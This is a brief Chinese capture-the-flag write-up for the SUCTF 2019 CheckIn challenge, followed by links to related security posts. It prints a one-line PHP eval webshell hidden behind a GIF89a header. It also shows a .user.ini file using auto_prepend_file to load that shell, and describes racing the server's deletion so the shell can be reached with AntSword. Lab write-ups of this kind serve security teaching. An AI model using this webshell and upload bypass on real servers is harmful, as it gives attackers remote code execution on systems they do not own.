[SUCTF 2019]CheckIn 1

八块腹肌的橘猫2024-05-07 19:43

解题步骤

  1. 上传木马图片,命名为b.php
xml 复制代码 
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>

  1. bp抓包,修改数据;然后可看到上传的文件

  2. 上传.user.ini文件,内容编写如下,然后bp抓包修改文件类型

php 复制代码 
GIF89a
auto_prepend_file=b.jpg


  1. 可发现,刚刚我们上传的木马b文件被删除了,这里我测试了几遍,只要速度够快,两个文件能够同时存在,能够用蚁剑连接。


相关推荐
一拳一个娘娘腔4 小时前
【SRC漏洞挖掘系列】第17期:漏洞组合拳(Chain Exploit)—— 把“蚊子”养成“恐龙”
网络·安全·web安全
llxxyy卢6 小时前
好靶场部分题目
web安全·web
德迅--文琪11 小时前
看不见的围墙:APP背后的网络安全暗门
安全·web安全
Fortinet_CHINA11 小时前
AI正在重塑网络安全格局,但技能差距仍是核心风险
人工智能·安全·web安全
宋浮檀s1 天前
春秋云镜——CVE-2020-25540
网络·安全·web安全
郑洁文1 天前
面向Web安全的Python渗透测试系统设计与实现
python·安全·web安全
woniu_buhui_fei1 天前
常见的网络攻击
web安全
WangX-西石油1 天前
DVWA靶场Low级别Brute Force学习
学习·web安全·网络安全
小熊officer1 天前
网络渗透(Network Penetration)
网络·安全·web安全
热门推荐
01GitHub 镜像站点022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03Codex 下载安装指南:Windows 和 macOS 官方版下载04【AI】2026 年具身智能模型和世界模型总结05【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法06Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复07裂开!ChatGPT 居然开始要手机号验证,附详细解决方法08CC-Switch 下载、安装与使用配置指南【2026.5.29】09CC-Switch & Claude 基于 Linux 服务器安装使用指南10Codex 接入 DeepSeek API 完整配置文档